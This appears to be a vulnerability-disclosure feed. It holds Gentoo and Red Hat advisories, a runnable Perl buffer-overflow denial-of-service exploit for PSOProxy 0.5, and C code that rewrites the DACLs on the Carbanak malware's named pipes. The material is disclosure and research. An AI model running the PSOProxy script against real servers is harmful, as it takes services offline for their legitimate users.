Gentoo Linux Security Advisory 202401-14 - A denial of service vulnerability has been found in RedCloth. Versions greater than or equal to 4.3.2-r5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-14  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: RedCloth: ReDoS Vulnerability  
     Date: January 10, 2024  
     Bugs: #908035  
       ID: 202401-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A denial of service vulnerability has been found in RedCloth.

Background  
==========

RedCloth is a module for using Textile in Ruby

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
dev-ruby/redcloth  < 4.3.2-r5    >= 4.3.2-r5

Description  
===========

A vulnerability has been discovered in RedCloth. Please review the CVE  
identifier referenced below for details.

Impact  
======

RedCloth is vulnerable to a regular expression denial of service  
("ReDoS") attack via the sanitize_html function.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All RedCloth users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-ruby/redcloth-4.3.2-r5"

References  
==========

[ 1 ] CVE-2023-31606  
      https://nvd.nist.gov/vuln/detail/CVE-2023-31606

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-14

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-14

Gentoo Linux Security Advisory 202401-13 - Multiple denial of service vulnerabilities have been found in FAAD2. Versions greater than or equal to 2.11.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: FAAD2: Multiple Vulnerabilities  
     Date: January 10, 2024  
     Bugs: #918558  
       ID: 202401-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple denial of service vulnerabilities have been found in FAAD2.

Background  
==========

FAAD2 is an open source MPEG-4 and MPEG-2 AAC decoder.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
media-libs/faad2  < 2.11.0      >= 2.11.0

Description  
===========

Multiple vulnerabilities have been discovered in FAAD2. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All FAAD2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/faad2-2.11.0"

References  
==========

[ 1 ] CVE-2023-38857  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38857  
[ 2 ] CVE-2023-38858  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38858

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-13

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-13

PSOProxy version 0.5 suffers from a denial of service vulnerability.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: PSOProxy 0.5 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 10 january 2024  
# Vendor Homepage:  https://sourceforge.net/projects/psoproxy/files/psoproxy/0.5/  
# Download to demo: https://drive.google.com/file/d/1GC2GWGOx9Z1vWT_mxnGXHuTptuHa7lIp/view?usp=sharing  
# Download to demo 2: https://drive.google.com/file/d/1DHQ1sZL3mqlqFWn50eq7FLVtzX3E6qgC/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: PSOProxy 0.5  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=0uuUqfpRbHM

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to web server.  
#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

my $i=0;  
    print "\t    ==> Exploiting... \n\n";  
while ($i <= 9) {  
    my $sock = IO::Socket::INET->new(  
        PeerAddr => $ip,  
        PeerPort => $port,  
        Proto    => 'tcp',  
    ) or die "Cannot connect to $ip:$port: $!\n";

    my $buffer = "A" x 3000;  
    my $shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .  
                    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

        $buffer .= "\x0F\x98\xF8\x77" . $shellcode;

    print $sock $buffer . "\r\n";  
    close($sock);

        $i++;  
}

  print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

                              ,--,  
                       _ ___/ /\|  
                   ,;'( )__, )  ~  
                  //  //   '--;   
                  '   \     | ^  
                       ^    ^

      [+] PSOProxy 0.5 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

PSOProxy 0.5 Denial Of Service

Backdoor.Win32 Carbanak (Anunak) malware creates 8 named pipes used for C2 and interprocess communications and grants RW access to the Everyone user group.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b8e1e5b832e5947f41fd6ae6ef6d09a1.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32 Carbanak (Anunak)Vulnerability: Named Pipe Null DACLFamily: CarbanakType: PE32MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1Vuln ID: MVID-2024-0667Dropped files: AlhEXlUJ.exe, AlhEXlUJbVpfX1EMVw.binDisclosure: 01/09/2024Description: Carbanak malware creates 8 named pipes used for C2 and interprocess communications and grants RW access to the Everyone user group.Low privileged users can modify the pipes DACLs, removing rights for Everyone denying access to all users. First 6 pipes are created by its parent processand last 2 by the child process. The pipes names are randomly generated each time it is run all except for one JFNfVUYDXmlZQV.Therefore, we can detect Carbanak by that one pipe, as the "JFNfVUYDXmlZQVI" pipe is always created regardless of other randomly named pipes.Listing Carbanaks named pipes they get grouped as they are created at same time with 2 of them listed prior to the JFNfVUYDXmlZQVI pipe.Carbanak creates a directory named "Mozilla" under ProgramData with hidden files, one of which is AlhEXlUJ.exe used by the service it creates which runs as SYSTEM. The malwares service names created seem to use an already existing service name and add "Sys" at the end of its name.Exploitation steps, output all named pipes and look for "JFNfVUYDXmlZQVI" if detected, exploit the DACL on 2 previously listed pipes and 5 pipes listed after.Successfully tested in VM environment.Carbanak IPC Named Pipes:\\.\Pipe\cltjLnYRKKjUESTvgGdmERTb   RW Everyone\\.\Pipe\tGYNSgZvVXwumEhdcF    RW Everyone\\.\Pipe\JFNfVUYDXmlZQVI   <=====  ALWAYS CREATED  RW Everyone\\.\Pipe\PoUXbOHFRuUZAufnlpMZoqdtIfOX  RW Everyone\\.\Pipe\oBcVHguxbnjGbSgkJptifqvNFgD  RW Everyone\\.\Pipe\iDToHxpSCbEIEHPBeQ  RW Everyone\\.\Pipe\YutsGUYwwUusszByeuXUQK  RW Everyone\\.\Pipe\UfnQmAUTVtEkYvMoUWAZekAuWZHe  RW EveryoneExploit/PoC:#include "windows.h"#include "stdio.h"#include "accctrl.h"#include "aclapi.h"/*Carbanak: 48d208b87b29d50bb160f336c94b681e232b0f90e8c02175e593d60737369c13DACL IPC named pipes created and grants RW access for Everyone.We can identify Carbanak as out of the eight pipes it creates with random names the pipenamed JFNfVUYDXmlZQVI is always created. Pipes are typically grouped as they are createdat same time and typically 2 are previous to pipe JFNfVUYDXmlZQVI and others are created afterOutput named pipes find JFNfVUYDXmlZQVI and exploit DACL on 2 previous and 5 after.Successfully tested in VM environment.By Malvuln**//** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**/#define CARBANAK_PIPE "JFNfVUYDXmlZQVI"#define MAX_TOKENS 1024#define DELIMITER "\n"int str2Array(char*** argv, char *str);int Exploit(char *carbanak_pipe);int str2Array(char*** argv, char *str){char* buffer;int argc;buffer = (char *) malloc(strlen(str) * sizeof(char));strcpy(buffer, str);(*argv) = (char**) malloc(MAX_TOKENS * sizeof(char**));  argc = 0;    (*argv)[argc++] = strtok(buffer, DELIMITER);  while ((((*argv)[argc] = strtok(NULL, DELIMITER)) != NULL) &&   (argc < MAX_TOKENS)) ++argc;return argc;}int main(void){system("dir /b \\\\.\\pipe\\\\ > tmp.sys");int ch;char tmp[1];FILE *fp = fopen("tmp.sys", "r");fseek(fp, 0, SEEK_END);int bytes = ftell(fp) + 256;rewind(fp);char x[bytes]; while((ch = fgetc(fp)) != EOF){      if(feof(fp)){      break;     }    sprintf(tmp, "%c", ch);    strcat(x, tmp);}fclose(fp);char **A;int i, result = str2Array(&A, x);int delay = 300;int rc;BOOL infected=FALSE;for(i=0;i<result;i++){    if(strcmp(A[i], CARBANAK_PIPE)==0){    printf("[+] Carbanak (Anunak) malware IPC exploit\n");    printf("[!] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");    printf("[!] Named Pipe %s%s\n", CARBANAK_PIPE, " detected!");    printf("[+] Attack started...\n\n");        infected = TRUE;    Exploit(A[i]);    Sleep(delay);        Exploit(A[i-2]);    Sleep(delay);    Exploit(A[i-1]);    Sleep(delay);     Exploit(A[i+1]);    Sleep(delay);        Exploit(A[i+2]);    Sleep(delay);      Exploit(A[i+3]);    Sleep(delay);      Exploit(A[i+4]);    Sleep(delay);          rc = Exploit(A[i+5]);  }}    if(!infected){       printf("[+] Carbanak (Anunak) malware IPC Exploit \n");     printf("[+] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");     printf("[!] Named Pipe %s%s", CARBANAK_PIPE, " not found on the system.\n");     printf("[!] Aborting...");    }    if(rc==0){      printf("\n[!] Done!");          }  printf("\n[+] By Malvuln circa 2024\n\n");  system("pause");  return 0;}int Exploit(char *malpipe){      char MALPIPE_PREFIX[269] = "\\\\.\\pipe\\";    strcat(MALPIPE_PREFIX, malpipe);    HANDLE hPipe = CreateFileA((LPCSTR)MALPIPE_PREFIX, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, 0, NULL);            PACL pOldDACL = NULL;    PACL pNewDACL = NULL;  if (hPipe == INVALID_HANDLE_VALUE){        int rc = GetLastError();      if(rc==5){       printf("[!] Access Denied for pipe: %s\n", malpipe);       }             return 1;}    if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){     printf("[!] Error: %d",  GetLastError());    return 1;  }      TRUSTEE trustee[1];    trustee[0].TrusteeForm = TRUSTEE_IS_NAME;    trustee[0].TrusteeType = TRUSTEE_IS_GROUP;    trustee[0].ptstrName = TEXT("Everyone");    trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;    trustee[0].pMultipleTrustee = NULL;    EXPLICIT_ACCESS explicit_access_list[1];    ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));    explicit_access_list[0].grfAccessMode = DENY_ACCESS;     explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;    explicit_access_list[0].grfInheritance = NO_INHERITANCE;    explicit_access_list[0].Trustee = trustee[0];        if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){       printf("[!] Error: %d",  GetLastError());      return 1;    }          if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){                   printf("[!] Error: %d",  GetLastError());       return 1;           }else{       printf("[+] Modifying IPC Pipe DACL ==> %s\n", MALPIPE_PREFIX);      }        LocalFree(pNewDACL);    LocalFree(pOldDACL);    CloseHandle(hPipe);        return 0;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32 Carbanak (Anunak) MVID-2024-0667 Named Pipe NULL DACL

Red Hat Security Advisory 2024-0101-03 - Red Hat build of Keycloak 22.0.8 is now available from the Customer Portal. Issues addressed include an open redirection vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0101.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat build of Keycloak 22.0.8 enhancement and security updateAdvisory ID:        RHSA-2024:0101-03Product:            Red Hat build of KeycloakAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0101Issue date:         2024-01-09Revision:           03CVE Names:          CVE-2023-6927====================================================================Summary: Red Hat build of Keycloak 22.0.8 is now available from the Customer Portal.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat build of Keycloak 22.0.8 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat build of Keycloak 22.0.8 serves as a replacement for Red Hat build of Keycloak 22.0.7, and includes bug fixes, enhancements and security fixes, which are documented in the Release Notes document linked to in the References.Security Fix(es):* open redirect via \"form_post.jwt\" JARM response mode (CVE-2023-6927)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/documentation/en-us/red_hat_build_of_keycloak/22.0/html-single/migration_guide/CVEs:CVE-2023-6927References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2255027

Red Hat Security Advisory 2024-0101-03

Red Hat Security Advisory 2024-0100-03 - A security update is now available for Red Hat build of Keycloak 22.0.8 images running on OpenShift Container Platform. Issues addressed include an open redirection vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0100.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat build of Keycloak 22.0.8 images enhancement and security updateAdvisory ID:        RHSA-2024:0100-03Product:            Red Hat build of KeycloakAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0100Issue date:         2024-01-09Revision:           03CVE Names:          CVE-2023-6927====================================================================Summary: A security update is now available for Red Hat build of Keycloak 22.0.8 images running on OpenShift Container Platform.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat build of Keycloak 22.0.8 is an integrated solution, available as a Red Hat JBoss Middleware for OpenShift containerized image, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This erratum releases a security update and enhancement images for Red Hat build of Keycloak 22.0.8 for use within the OpenShift Container Platform 4.12, 4.13 and 4.14 cloud computing Platform-as-a-Service (PaaS) for on-premise or private cloud deployments, aligning with the standalone product release.Security Fix(es):* open redirect via \"form_post.jwt\" JARM response mode (CVE-2023-6927)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6927References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2255027

Red Hat Security Advisory 2024-0100-03

Red Hat Security Advisory 2024-0098-03 - A security update is now available for Red Hat Single Sign-On 7.6 from the Customer Portal. Issues addressed include an open redirection vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0098.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat Single Sign-On 7.6.6 security updateAdvisory ID:        RHSA-2024:0098-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0098Issue date:         2024-01-09Revision:           03CVE Names:          CVE-2023-6927====================================================================Summary: A security update is now available for Red Hat Single Sign-On 7.6 from the Customer Portal.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.6 serves as a replacement for Red Hat Single Sign-On 7.6.5, and includes bug fixes and enhancements.Security Fix(es):* open redirect via \"form_post.jwt\" JARM response mode (CVE-2023-6927)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6927References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2255027

Red Hat Security Advisory 2024-0098-03

Red Hat Security Advisory 2024-0097-03 - A new image is available for Red Hat Single Sign-On 7.6.6, running on OpenShift Container Platform 3.10 and 3.11, and 4.3. Issues addressed include an open redirection vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0097.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat Single Sign-On 7.6.6 for OpenShift image enhancement and security updateAdvisory ID:        RHSA-2024:0097-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0097Issue date:         2024-01-09Revision:           03CVE Names:          CVE-2023-6927====================================================================Summary: A new image is available for Red Hat Single Sign-On 7.6.6, running on OpenShift Container Platform 3.10 and 3.11, and 4.3.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On is an integrated sign-on solution, available as a Red Hat JBoss Middleware for OpenShift containerized image. The Red Hat Single Sign-On for OpenShift image provides an authentication server that you can use to log in centrally, log out, and register. You can also manage user accounts for web applications, mobile applications, and RESTful web services.This erratum releases a new image for Red Hat Single Sign-On 7.6.6 for use within the OpenShift Container Platform 3.10, OpenShift Container Platform 3.11, and OpenShift Container Platform 4.3 cloud computing Platform-as-a-Service (PaaS) for on-premise or private cloud deployments, aligning with the standalone product release.Security Fix(es):* open redirect via \"form_post.jwt\" JARM response mode (CVE-2023-6927)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://raw.githubusercontent.com/jboss-container-images/redhat-sso-7-openshift-image/v7.6.6.GA/templates/${resource}CVEs:CVE-2023-6927References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2255027

Red Hat Security Advisory 2024-0097-03

Red Hat Security Advisory 2024-0096-03 - New Red Hat Single Sign-On 7.6.6 packages are now available for Red Hat Enterprise Linux 9. Issues addressed include an open redirection vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0096.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat Single Sign-On 7.6.6 security update on RHEL 9Advisory ID:        RHSA-2024:0096-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0096Issue date:         2024-01-09Revision:           03CVE Names:          CVE-2023-6927====================================================================Summary: New Red Hat Single Sign-On 7.6.6 packages are now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.6 on RHEL 9 serves as a replacement for Red Hat Single Sign-On 7.6.5, and includes bug fixes and enhancements.Security Fix(es):* open redirect via \"form_post.jwt\" JARM response mode (CVE-2023-6927)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6927References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2255027

Red Hat Security Advisory 2024-0096-03

Red Hat Security Advisory 2024-0095-03 - New Red Hat Single Sign-On 7.6.6 packages are now available for Red Hat Enterprise Linux 8. Issues addressed include an open redirection vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0095.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat Single Sign-On 7.6.6 security update on RHEL 8Advisory ID:        RHSA-2024:0095-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0095Issue date:         2024-01-09Revision:           03CVE Names:          CVE-2023-6927====================================================================Summary: New Red Hat Single Sign-On 7.6.6 packages are now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.6 on RHEL 8 serves as a replacement for Red Hat Single Sign-On 7.6.5, and includes bug fixes and enhancements.Security Fix(es):* open redirect via \"form_post.jwt\" JARM response mode (CVE-2023-6927)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6927References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2255027

Tag

#web